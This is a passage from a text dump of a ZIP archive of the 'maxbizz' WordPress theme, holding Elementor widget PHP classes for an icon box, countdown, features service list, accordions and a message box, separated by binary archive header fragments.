					'{{WRAPPER}} .icon-box .title-box' => 'margin-bottom: {{SIZE}}{{UNIT}};',
				],
			]
		);

		$this->add_control(
			'title_hcolor',
			[
				'label' => __( 'Hover Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .icon-box .title-box a:hover' => 'color: {{VALUE}};',
				],
				'condition' => [
					'link[url]!' => '',
				]
			]
		);
		$this->add_group_control(
			Group_Control_Typography::get_type(),
			[
				'name' => 'title_typography',
				'selector' => '{{WRAPPER}} .icon-box .title-box',
			]
		);

		//Description
		$this->add_control(
			'heading_des',
			[
				'label' => __( 'Description', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
				'separator' => 'before',
				'condition' => [
					'des!' => ''
				]
			]
		);
		$this->add_group_control(
			Group_Control_Typography::get_type(),
			[
				'name' => 'des_typography',
				'selector' => '{{WRAPPER}} .icon-box p',
				'condition' => [
					'des!' => ''
				]
			]
		);

		$this->end_controls_section();

	}

	protected function render() {
		$settings = $this->get_settings_for_display();

		$this->add_render_attribute( 'heading', 'class', 'title-box' );
		$title = $settings['title'];
		$title_html = sprintf( '<%1$s %2$s>%3$s</%1$s>', $settings['header_size'], $this->get_render_attribute_string( 'heading' ), $title );
		
		if ( ! empty( $settings['link']['url'] ) ) {
			$this->add_render_attribute( 'iconbox', 'href', $settings['link']['url'] );

			if ( $settings['link']['is_external'] ) {
				$this->add_render_attribute( 'iconbox', 'target', '_blank' );
			}

			if ( $settings['link']['nofollow'] ) {
				$this->add_render_attribute( 'iconbox', 'rel', 'nofollow' );
			}
			$title_html = sprintf( '<%1$s %2$s><a ' .$this->get_render_attribute_string( 'iconbox' ). '>%3$s</a></%1$s>', $settings['header_size'], $this->get_render_attribute_string( 'heading' ), $title );
		}

		?>
		<div class="icon-box icon-box-2">
			<div class="icon-main">
		        <?php if( $settings['icon_font'] != '' ) { Icons_Manager::render_icon( $settings['icon_font'], [ 'aria-hidden' => 'true' ] ); } ?>
	        </div>
	        <div class="content-box">
				<?php if( $settings['title'] ) { echo $title_html; } ?>
				<?php if( $settings['des'] ) { echo '<p>' .$settings['des']. '</p>'; } ?>
			</div>
	    </div>
	    <?php
	}

	protected function _content_template() {}

	public function get_keywords() {
		return [ 'service' ];
	}
}
// After the Maxbizz_IconBox2 class is defined, I must register the new widget class with Elementor:
Plugin::instance()->widgets_manager->register_widget_type( new Maxbizz_IconBox2() );PK�8FZ>/M���+inc/backend/elementor/widgets/countdown.phpnu�[���<?php
namespace Elementor; // Custom widgets must be defined in the Elementor namespace
if ( ! defined( 'ABSPATH' ) ) exit; // Exit if accessed directly (security measure)

/**
 * Widget Name: Contact Info
 */
class MaxBizz_CountDown extends Widget_Base{

 	// The get_name() method is a simple one, you just need to return a widget name that will be used in the code.
	public function get_name() {
		return 'icountdown';
	}

	// The get_title() method, which again, is a very simple one, you need to return the widget title that will be displayed as the widget label.
	public function get_title() {
		return __( 'OT CountDown', 'maxbizz' );
	}

	// The get_icon() method, is an optional but recommended method, it lets you set the widget icon. you can use any of the eicon or font-awesome icons, simply return the class name as a string.
	public function get_icon() {
		return 'eicon-countdown';
	}

	// The get_categories method, lets you set the category of the widget, return the category name as a string.
	public function get_categories() {
		return [ 'category_maxbizz' ];
	}

	protected function _register_controls() {

		$this->start_controls_section(
			'content_section',
			[
				'label' => __( 'CountDown', 'maxbizz' ),
			]
		);

		$this->add_responsive_control(
			'align',
			[
				'label' => __( 'Alignment', 'maxbizz' ),
				'type' => Controls_Manager::CHOOSE,
				'options' => [
					'left'    => [
						'title' => __( 'Left', 'maxbizz' ),
						'icon' => 'eicon-text-align-left',
					],
					'center' => [
						'title' => __( 'Center', 'maxbizz' ),
						'icon' => 'eicon-text-align-center',
					],
					'right' => [
						'title' => __( 'Right', 'maxbizz' ),
						'icon' => 'eicon-text-align-right',
					],
				],
				// 'prefix_class' => 'maxbizz%s-align-',
				'selectors' => [
					'{{WRAPPER}}' => 'text-align: {{VALUE}};',
				],
			]
		);

		$this->add_control(
			'date',
			[
				'label' => 'Date - Time',
				'type' => Controls_Manager::DATE_TIME,
				'default' => __( '2020-10-22 12:00', 'maxbizz' ),
			]
		);

		$this->add_control(
			'zone',
			[
				'label' => __( 'UTC Timezone Offset', 'maxbizz' ),
				'type' => Controls_Manager::NUMBER,
				'default' => __( '0', 'maxbizz' ),
			]
		);

		$this->start_controls_tabs( 'tabs_titles' );

		$this->start_controls_tab(
			'tab_title_normal',
			[
				'label' => __( 'One', 'maxbizz' ),
			]
		);
		$this->add_control(
			'day',
			[
				'label' => __( 'Day', 'maxbizz' ),
				'type' => Controls_Manager::TEXT,
				'default' => __( 'Day', 'maxbizz' ),
			]
		);
		$this->add_control(
			'hour',
			[
				'label' => __( 'Hour', 'maxbizz' ),
				'type' => Controls_Manager::TEXT,
				'default' => __( 'Hour', 'maxbizz' ),
			]
		);
		$this->add_control(
			'min',
			[
				'label' => __( 'Minute', 'maxbizz' ),
				'type' => Controls_Manager::TEXT,
				'default' => __( 'Minute', 'maxbizz' ),
			]
		);
		$this->add_control(
			'second',
			[
				'label' => __( 'Second', 'maxbizz' ),
				'type' => Controls_Manager::TEXT,
				'default' => __( 'Second', 'maxbizz' ),
			]
		);

		$this->end_controls_tab();

		$this->start_controls_tab(
			'tab_title_active',
			[
				'label' => __( 'Multi', 'maxbizz' ),
			]
		);
		$this->add_control(
			'days',
			[
				'label' => __( 'Days', 'maxbizz' ),
				'type' => Controls_Manager::TEXT,
				'default' => __( 'Days', 'maxbizz' ),
			]
		);
		$this->add_control(
			'hours',
			[
				'label' => __( 'Hours', 'maxbizz' ),
				'type' => Controls_Manager::TEXT,
				'default' => __( 'Hours', 'maxbizz' ),
			]
		);
		$this->add_control(
			'mins',
			[
				'label' => __( 'Minutes', 'maxbizz' ),
				'type' => Controls_Manager::TEXT,
				'default' => __( 'Minutes', 'maxbizz' ),
			]
		);
		$this->add_control(
			'seconds',
			[
				'label' => __( 'Seconds', 'maxbizz' ),
				'type' => Controls_Manager::TEXT,
				'default' => __( 'Seconds', 'maxbizz' ),
			]
		);

		$this->end_controls_tab();

		$this->end_controls_tabs();

		$this->end_controls_section();

		$this->start_controls_section(
			'style_content_section',
			[
				'label' => __( 'Style', 'maxbizz' ),
				'tab'   => Controls_Manager::TAB_STYLE,
			]
		);

		//Number
		$this->add_control(
			'heading_number',
			[
				'label' => __( 'Number', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
				'separator' => 'before',
			]
		);
		$this->add_control(
			'number_color',
			[
				'label' => __( 'Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .ot-countdown li span' => 'color: {{VALUE}};',
				]
			]
		);
		$this->add_group_control(
			Group_Control_Typography::get_type(),
			[
				'name' => 'number_typography',
				'selector' => '{{WRAPPER}} .ot-countdown li span, {{WRAPPER}} .ot-countdown li.seperator',
			]
		);
		$this->add_responsive_control(
			'number_space',
			[
				'label' => __( 'Spacing', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 0,
						'max' => 200,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .ot-countdown li span' => 'margin-bottom: {{SIZE}}{{UNIT}};',
				],
			]
		);

		//Title
		$this->add_control(
			'heading_titles',
			[
				'label' => __( 'Texts', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
				'separator' => 'before',
			]
		);
		
		$this->add_control(
			'title_color',
			[
				'label' => __( 'Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .ot-countdown p' => 'color: {{VALUE}};',
				]
			]
		);
		$this->add_group_control(
			Group_Control_Typography::get_type(),
			[
				'name' => 'title_typography',
				'selector' => '{{WRAPPER}} .ot-countdown p',
			]
		);

		//Seperator
		$this->add_control(
			'heading_sepe',
			[
				'label' => __( 'Seperator', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
				'separator' => 'before',
			]
		);
		$this->add_control(
			'sepe_color',
			[
				'label' => __( 'Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .ot-countdown li.seperator' => 'color: {{VALUE}};',
				]
			]
		);

		$this->end_controls_section();

	}

	protected function render() {
		$settings = $this->get_settings_for_display();

		$datex = str_replace('-','/',$settings['date']);
		$next_date = date('m/d/Y', strtotime(' +25 days')); // Use for demo only
		?>
			
		<ul class="ot-countdown unstyle" data-zone="<?php echo $settings['zone']; ?>" data-date="<?php echo $datex; ?>" data-day="<?php echo $settings['day']; ?>" data-days="<?php echo $settings['days']; ?>" data-hour="<?php echo $settings['hour']; ?>" data-hours="<?php echo $settings['hours']; ?>" data-min="<?php echo $settings['min']; ?>" data-mins="<?php echo $settings['mins']; ?>" data-second="<?php echo $settings['second']; ?>" data-seconds="<?php echo $settings['seconds']; ?>">
			<li><span class="days">00</span><p class="days_text">Days</p></li>
			<li class="seperator">:</li>
			<li><span class="hours">00</span><p class="hours_text">Hours</p></li>
			<li class="seperator">:</li>
			<li><span class="minutes">00</span><p class="minutes_text">Minutes</p></li>
			<li class="seperator">:</li>
			<li><span class="seconds">00</span><p class="seconds_text">Seconds</p></li>
		</ul>

	    <?php
	}

	protected function _content_template() {}
}
// After the MaxBizz_CountDown class is defined, I must register the new widget class with Elementor:
Plugin::instance()->widgets_manager->register_widget_type( new MaxBizz_CountDown() );PK�8FZ)�2��8�82inc/backend/elementor/widgets/features-service.phpnu�[���<?php
namespace Elementor; // Custom widgets must be defined in the Elementor namespace
if ( ! defined( 'ABSPATH' ) ) exit; // Exit if accessed directly (security measure)

/**
 * Widget Name: Button
 */
class Maxbizz_Features_Service extends Widget_Base{

 	// The get_name() method is a simple one, you just need to return a widget name that will be used in the code.
	public function get_name() {
		return 'ifearuresservice';
	}

	// The get_title() method, which again, is a very simple one, you need to return the widget title that will be displayed as the widget label.
	public function get_title() {
		return __( 'OT Features Service', 'maxbizz' );
	}

	// The get_icon() method, is an optional but recommended method, it lets you set the widget icon. you can use any of the eicon or font-awesome icons, simply return the class name as a string.
	public function get_icon() {
		return 'eicon-background';
	}

	// The get_categories method, lets you set the category of the widget, return the category name as a string.
	public function get_categories() {
		return [ 'category_maxbizz' ];
	}

	/**
	 * Get button sizes.
	 *
	 * Retrieve an array of button sizes for the button widget.
	 *
	 * @since 1.0.0
	 * @access public
	 * @static
	 *
	 * @return array An array containing button sizes.
	 */

	protected function _register_controls() {

		//Content Features Service List
		$this->start_controls_section(
			'fservice_section',
			[
				'label' => __( 'Button', 'maxbizz' ),
			]
        );

        $repeater = new Repeater();

        $repeater->add_control(
			'fservice_image',
			[
				'label' => __( 'Image', 'maxbizz' ),
				'type' => Controls_Manager::MEDIA,
			]
		);

        $repeater->add_control(
			'fservice_number',
			[
				'label' => __( 'Number:', 'maxbizz' ),
				'type' => Controls_Manager::TEXT,
				'default' => __( '01', 'maxbizz' ),
			]
		);

        $repeater->add_control(
			'fservice_title',
			[
				'label' => __( 'Title & Content', 'maxbizz' ),
				'type' => Controls_Manager::TEXT,
				'default' => __( 'Service Title', 'maxbizz' ),
				'placeholder' => __( 'Service Title', 'maxbizz' ),
				'label_block' => true,
			]
		);
		$repeater->add_control(
			'fservice_content',
			[
				'label' => __( 'Description', 'maxbizz' ),
				'type' => Controls_Manager::TEXTAREA,
				'default' => esc_html__( 'Accelerate your innovation and transformation with a fully integrated suite of capabilities that puts digital at the heart of everything you do.', 'maxbizz' ),
			]
		);
		$repeater->add_control(
			'link',
			[
				'label' => __( 'Link', 'maxbizz' ),
				'type' => Controls_Manager::URL,
				'placeholder' => __( 'https://your-link.com', 'maxbizz' ),
			]
		);

		$this->add_control(
			'fservice_lists',
			[
				'label' => __( 'Features Service List Items', 'maxbizz' ),
				'type' => Controls_Manager::REPEATER,
				'fields' => $repeater->get_controls(),
				'default' => [
					[
						'fservice_number' => __( '01', 'maxbizz' ),
						'fservice_title' => __( 'Title #1', 'maxbizz' ),
						'fservice_content' => __( 'Accelerate your innovation and transformation with a fully integrated suite of capabilities that puts digital at the heart of everything you do.', 'maxbizz' ),
						'link' => '#',
					],
					[
						'fservice_number' => __( '02', 'maxbizz' ),
						'fservice_title' => __( 'Title #2', 'maxbizz' ),
						'fservice_content' => __( 'Accelerate your innovation and transformation with a fully integrated suite of capabilities that puts digital at the heart of everything you do.', 'maxbizz' ),
						'link' => '#',
					],
				],
				'title_field' => '{{{ fservice_title }}}',
			]
		);

		$this->add_control(
			'btn_text',
			[
				'label' => __( 'Label Button', 'maxbizz' ),
				'type' => Controls_Manager::TEXT,
				'default' => __( 'Read More', 'maxbizz' ),
			]
		);

		$this->add_responsive_control(
			'fservice_height',
			[
				'label' => __( 'Height', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 200,
						'max' => 1000,
					],
				],
				'default' => [
					'unit' => 'px',
					'size' => 745,
				],
				'selectors' => [
					'{{WRAPPER}} .features-service-wrapper .features-service-item' => 'height: {{SIZE}}{{UNIT}};',
				],
			]
		);


		$this->end_controls_section();
		//Style

		$this->start_controls_section(
			'style_fservice_section',
			[
				'label' => __( 'General', 'maxbizz' ),
				'tab'   => Controls_Manager::TAB_STYLE,
			]
		);
		$this->add_control(
			'fservice_list_padding',
			[
				'label' => __( 'Padding Box', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
			]
		);
		$this->add_responsive_control(
			'fservice_padding',
			[
				'label' => 'Padding Content',
				'type' => Controls_Manager::DIMENSIONS,
				'size_units' => [ 'px', 'em', '%' ],
				'selectors' => [
					'{{WRAPPER}} .features-service-item .features-service-content' => 'padding: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
				],
			]
		);
		$this->start_controls_tabs( 'fservice_content_style' );
		$this->start_controls_tab(
			'fservice_style_normal',
			[
				'label' => __( 'Normal', 'maxbizz' ),
			]
		);

		$this->add_control(
			'fservice_number_color',
			[
				'label' => __( 'Number', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .features-service-item .features-service-title span' => 'color: {{VALUE}};',
				],
			]
		);
		$this->add_control(
			'fservice_title_color',
			[
				'label' => __( 'Title', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .features-service-item .features-service-title h4' => 'color: {{VALUE}};',
				],
			]
		);
		$this->add_control(
			'fservice_desc_color',
			[
				'label' => __( 'Description', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .features-service-item .features-service-content' => 'color: {{VALUE}};',
				],
			]
		);

		$this->end_controls_tab();
		$this->start_controls_tab(
			'fservice_style_hover',
			[
				'label' => __( 'Hover', 'maxbizz' ),
			]
		);
		$this->add_control(
			'fservice_number_hcolor',
			[
				'label' => __( 'Number', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .features-service-item:hover .features-service-title span' => 'color: {{VALUE}};',
				],
			]
		);
		$this->add_control(
			'fservice_title_hcolor',
			[
				'label' => __( 'Title', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .features-service-item:hover .features-service-title h4' => 'color: {{VALUE}};',
				],
			]
		);
		$this->add_control(
			'fservice_desc_hcolor',
			[
				'label' => __( 'Description', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .features-service-item:hover .features-service-content' => 'color: {{VALUE}};',
				],
			]
		);
		$this->add_control(
			'fservice_overlay_color',
			[
				'label' => __( 'Overlay', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .features-service-item .features-service-overlay' => 'background-color: {{VALUE}};',
				],
			]
		);

		$this->end_controls_tab();
		$this->end_controls_tabs();

		$this->end_controls_section();

		$this->start_controls_section(
			'style_content_section',
			[
				'label' => __( 'Content', 'maxbizz' ),
				'tab'   => Controls_Manager::TAB_STYLE,
			]
		);

		//Number
		$this->add_control(
			'heading_number',
			[
				'label' => __( 'Number', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
				'separator' => 'before',
			]
		);
		$this->add_responsive_control(
			'number_space',
			[
				'label' => __( 'Spacing', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 0,
						'max' => 100,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .features-service-item .features-service-title span' => 'margin-bottom: {{SIZE}}{{UNIT}};',
				],
			]
		);
		$this->add_group_control(
			Group_Control_Typography::get_type(),
			[
				'name' => 'number_typography',
				'selector' => '{{WRAPPER}} .features-service-item .features-service-title span',
			]
		);

		//Title
		$this->add_control(
			'heading_title',
			[
				'label' => __( 'Title', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
				'separator' => 'before',
			]
		);
		$this->add_group_control(
			Group_Control_Typography::get_type(),
			[
				'name' => 'title_typography',
				'selector' => '{{WRAPPER}} .features-service-item .features-service-title h4',
			]
		);

		//Description
		$this->add_control(
			'heading_desc',
			[
				'label' => __( 'Description', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
				'separator' => 'before',
			]
		);
		$this->add_group_control(
			Group_Control_Typography::get_type(),
			[
				'name' => 'desc_typography',
				'selector' => '{{WRAPPER}} .features-service-item .features-service-content',
			]
		);
		$this->end_controls_section();

		// Button
		$this->start_controls_section(
			'style_section_btn',
			[
				'label' => __( 'Button', 'maxbizz' ),
				'tab'   => Controls_Manager::TAB_STYLE,
			]
		);

		//Normal
		$this->start_controls_tabs( 'tabs_button_style' );

		$this->start_controls_tab(
			'tab_button_normal',
			[
				'label' => __( 'Normal', 'maxbizz' ),
			]
		);

		$this->add_control(
			'button_icon_color',
			[
				'label' => __( 'Icon Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .features-service-wrapper .btn-details' => 'color: {{VALUE}};',
				],
			]
		);

		$this->add_control(
			'background_color',
			[
				'label' => __( 'Background Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'selectors' => [
					'{{WRAPPER}} .features-service-wrapper .btn-details' => 'background: {{VALUE}};',
				],
			]
		);
		$this->add_control(
			'border_color',
			[
				'label' => __( 'Border Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'selectors' => [
					'{{WRAPPER}} .features-service-wrapper .btn-details' => 'border-color: {{VALUE}};',
				],
			]
		);

		$this->end_controls_tab();

		//Hover

		$this->start_controls_tab(
			'tab_button_hover',
			[
				'label' => __( 'Hover', 'maxbizz' ),
			]
		);

		$this->add_control(
			'btn_icon_hcolor',
			[
				'label' => __( 'Icon', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'selectors' => [
					'{{WRAPPER}} .features-service-wrapper .btn-details:hover i' => 'color: {{VALUE}};',
				],
			]
		);
		$this->add_control(
			'btn_text_hcolor',
			[
				'label' => __( 'Text Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'selectors' => [
					'{{WRAPPER}} .features-service-wrapper .btn-details:hover .btn-text' => 'color: {{VALUE}};',
				],
			]
		);

		$this->add_control(
			'btn_bg_hcolor',
			[
				'label' => __( 'Background Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'selectors' => [
					'{{WRAPPER}} .features-service-wrapper .btn-details:hover' => 'background-color: {{VALUE}};',
				],
			]
		);
		$this->add_control(
			'btn_border_hcolor',
			[
				'label' => __( 'Border Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'selectors' => [
					'{{WRAPPER}} .features-service-wrapper .btn-details:hover' => 'border-color: {{VALUE}};',
				],
			]
		);

		$this->end_controls_tab();

		$this->end_controls_tabs();

		$this->end_controls_section();

	}

	protected function render() {

		$settings = $this->get_settings_for_display();

		?>
		<div class="features-service-wrapper">
			<?php if ( $settings['fservice_lists'] ) : foreach ( $settings['fservice_lists'] as $key => $data ) { 
				$url = $data['fservice_image']['url'];
				$photo = wp_get_attachment_image( $data['fservice_image']['id'], 'full' );

				if ( ! empty( $data['link']['url'] ) ) {
					$this->add_render_attribute( 'link' . $key, 'href', $data['link']['url'] );

					if ( $data['link']['is_external'] ) {
						$this->add_render_attribute( 'link' . $key, 'target', '_blank' );
					}

					if ( $data['link']['nofollow'] ) {
						$this->add_render_attribute( 'link' . $key, 'rel', 'nofollow' );
					}
				}
				$this->add_render_attribute( 'link' . $key, 'class', 'btn-details btn-text-indent' );
				?>
					<div class="features-service-item" <?php if( $key === 0 ){ echo 'data-default="yes"'; } ?>>
						<div class="features-service-content">
							<div class="features-service-title">
								<span class="features-service-number"><?php echo $data['fservice_number']; ?></span>
								<h4><?php echo $data['fservice_title']; ?></h4>
							</div>
							<div class="features-service-desc">
								<?php if($data['fservice_content']){ ?><p><?php echo $data['fservice_content']; ?></p><?php } ?>
							</div>
							<?php if( $data['link']['url'] ) { ?>
							<div class="flex-middle features-service-link">
								<a <?php echo $this->get_render_attribute_string('link' . $key); ?>>
									<span class="btn-text"><?php echo esc_html($settings['btn_text']); ?></span>
									<i class="ot-flaticon-trajectory"></i>
								</a>
							</div>
							<?php } ?>
							<div class="features-service-overlay"></div>
						</div>
						<div class="features-service-img-reposive" style="background-image: url(<?php echo esc_url( $url ); ?>)"></div>
					</div>
					<figure class="features-service-img">
						<?php if( $data['fservice_image']['url'] ) { echo $photo; } ?>
					</figure>
			<?php } endif; ?>
		</div>

	    <?php
	}

	protected function _content_template() {}
}
// After the Maxbizz_Features_Service class is defined, I must register the new widget class with Elementor:
Plugin::instance()->widgets_manager->register_widget_type( new Maxbizz_Features_Service() );PK�8FZj����,inc/backend/elementor/widgets/accordions.phpnu�[���<?php
namespace Elementor; // Custom widgets must be defined in the Elementor namespace
if ( ! defined( 'ABSPATH' ) ) exit; // Exit if accessed directly (security measure)

/**
 * Widget Name: Accordions
 */
class Maxbizz_Accordions extends Widget_Base{

 	// The get_name() method is a simple one, you just need to return a widget name that will be used in the code.
	public function get_name() {
		return 'iaccordions';
	}

	// The get_title() method, which again, is a very simple one, you need to return the widget title that will be displayed as the widget label.
	public function get_title() {
		return __( 'OT Accordions', 'maxbizz' );
	}

	// The get_icon() method, is an optional but recommended method, it lets you set the widget icon. you can use any of the eicon or font-awesome icons, simply return the class name as a string.
	public function get_icon() {
		return 'eicon-accordion';
	}

	// The get_categories method, lets you set the category of the widget, return the category name as a string.
	public function get_categories() {
		return [ 'category_maxbizz' ];
	}

	protected function _register_controls() {

		//Content Service box
		$this->start_controls_section(
			'content_section',
			[
				'label' => __( 'Accordions', 'maxbizz' ),
			]
		);

		$repeater = new Repeater();

		$repeater->add_control(
			'acc_title',
			[
				'label' => __( 'Title & Content', 'maxbizz' ),
				'type' => Controls_Manager::TEXT,
				'default' => __( 'Accordion Title', 'maxbizz' ),
				'placeholder' => __( 'Accordion Title', 'maxbizz' ),
				'label_block' => true,
			]
		);

		$repeater->add_control(
			'acc_content',
			[
				'label' => __( 'Content', 'maxbizz' ),
				'default' => __( 'Accordion Content', 'maxbizz' ),
				'placeholder' => __( 'Accordion Content', 'maxbizz' ),
				'type' => Controls_Manager::WYSIWYG,
				'show_label' => false,
			]
		);

		$this->add_control(
			'ot_accs',
			[
				'label' => __( 'Accordion Items', 'maxbizz' ),
				'type' => Controls_Manager::REPEATER,
				'fields' => $repeater->get_controls(),
				'default' => [
					[
						'acc_title' => __( 'Accordion #1', 'maxbizz' ),
						'acc_content' => __( 'The basic philosophy of our studio is to create individual, aesthetically stunning solutions for our customers by lightning-fast development of projects employing unique styles.', 'maxbizz' ),
					],
					[
						'acc_title' => __( 'Accordion #2', 'maxbizz' ),
						'acc_content' => __( 'The basic philosophy of our studio is to create individual, aesthetically stunning solutions for our customers by lightning-fast development of projects employing unique styles.', 'maxbizz' ),
					],
				],
				'title_field' => '{{{ acc_title }}}',
			]
		);

		$this->end_controls_section();

		//Style
		/* title */
		$this->start_controls_section(
			'style_title',
			[
				'label' => __( 'Title', 'maxbizz' ),
				'tab'   => Controls_Manager::TAB_STYLE,
			]
		);
		$this->add_control(
			'bg_title',
			[
				'label' => __( 'Background', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .acc-item:not(.current) .acc-toggle' => 'background: {{VALUE}};',
				],
			]
		);
		$this->add_control(
			'bg_title_active',
			[
				'label' => __( 'Background Active', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .acc-item.current .acc-toggle' => 'background: {{VALUE}}; border-color: {{VALUE}};',
				],
			]
		);
		$this->add_control(
			'title_border',
			[
				'label' => __( 'Border Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .acc-item:not(.current) .acc-toggle' => 'border-color: {{VALUE}};',
				]
			]
		);
		$this->add_control(
			'title_color',
			[
				'label' => __( 'Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .acc-item:not(.current) .acc-toggle' => 'color: {{VALUE}};',
				]
			]
		);
		$this->add_control(
			'title_color_active',
			[
				'label' => __( 'Color Active', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .acc-item.current .acc-toggle' => 'color: {{VALUE}};',
				]
			]
		);
		$this->add_group_control(
			Group_Control_Typography::get_type(),
			[
				'name' => 'title_typography',
				'selector' => '{{WRAPPER}} .acc-toggle',
			]
		);
		$this->add_responsive_control(
			'title_padding',
			[
				'label' => __( 'Padding', 'maxbizz' ),
				'type' => Controls_Manager::DIMENSIONS,
				'size_units' => [ 'px', 'em', '%' ],
				'selectors' => [
					'{{WRAPPER}} .acc-item .acc-toggle' => 'padding: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
				],
			]
		);
		$this->end_controls_section();

		/* content */
		$this->start_controls_section(
			'style_content',
			[
				'label' => __( 'Content', 'maxbizz' ),
				'tab'   => Controls_Manager::TAB_STYLE,
			]
		);
		$this->add_control(
			'bg_content',
			[
				'label' => __( 'Background', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .acc-item .acc-content' => 'background: {{VALUE}};',
				],
			]
		);
		$this->add_control(
			'content_color',
			[
				'label' => __( 'Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .acc-content' => 'color: {{VALUE}};',
				]
			]
		);
		$this->add_group_control(
			Group_Control_Typography::get_type(),
			[
				'name' => 'content_typography',
				'selector' => '{{WRAPPER}} .acc-content',
			]
		);
		$this->add_responsive_control(
			'content_padding',
			[
				'label' => __( 'Padding', 'maxbizz' ),
				'type' => Controls_Manager::DIMENSIONS,
				'size_units' => [ 'px', 'em', '%' ],
				'selectors' => [
					'{{WRAPPER}} .acc-content' => 'padding: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
				],
			]
		);

		$this->end_controls_section();

	}

	protected function render() {
		$settings = $this->get_settings_for_display();
		$migrated = isset( $settings['__fa4_migrated']['icon_close'] );

		if ( ! isset( $settings['icon'] ) && ! Icons_Manager::is_migration_allowed() ) {
			// @todo: remove when deprecated
			// added as bc in 2.6
			// add old default
			$settings['icon'] = 'fas fa-plus';
			$settings['select_icon_active'] = 'far fa-window-minimize';
		}

		$is_new = empty( $settings['icon'] ) && Icons_Manager::is_migration_allowed();
		$has_icon = ( ! $is_new || ! empty( $settings['icon_close']['value'] ) );
		?>

		<div class="ot-accordions">
			<?php if ( $settings['ot_accs'] ) : foreach ( $settings['ot_accs'] as $key => $accs ) { ?>
			<div class="acc-item">
				<div class="acc-toggle flex-middle" <?php if( $key === 0 ){ echo 'data-default="yes"'; } ?> ><?php echo $accs['acc_title']; ?> 
					<i class="ot-flaticon-arrowsoutline"></i>
				</div>
				<div class="acc-content">
					<?php echo $accs['acc_content']; ?>
				</div>
			</div>
			<?php } endif; ?>
	    </div>

	    <?php
	}

	protected function _content_template() {}
}
// After the Maxbizz_Accordions class is defined, I must register the new widget class with Elementor:
Plugin::instance()->widgets_manager->register_widget_type( new Maxbizz_Accordions() );PK�8FZ�=����-inc/backend/elementor/widgets/message-box.phpnu�[���<?php
namespace Elementor; // Custom widgets must be defined in the Elementor namespace
if ( ! defined( 'ABSPATH' ) ) exit; // Exit if accessed directly (security measure)

/**
 * Widget Name: Message Box
 */
class Maxbizz_MessageBox extends Widget_Base{

 	// The get_name() method is a simple one, you just need to return a widget name that will be used in the code.
	public function get_name() {
		return 'imessagebox';
	}

	// The get_title() method, which again, is a very simple one, you need to return the widget title that will be displayed as the widget label.
	public function get_title() {
		return __( 'OT Message Box', 'maxbizz' );
	}

	// The get_icon() method, is an optional but recommended method, it lets you set the widget icon. you can use any of the eicon or font-awesome icons, simply return the class name as a string.
	public function get_icon() {
		return 'eicon-alert';
	}

	// The get_categories method, lets you set the category of the widget, return the category name as a string.
	public function get_categories() {
		return [ 'category_maxbizz' ];
	}

	protected function _register_controls() {

		$this->start_controls_section(
			'content_section',
			[
				'label' => __( 'Message Box', 'maxbizz' ),
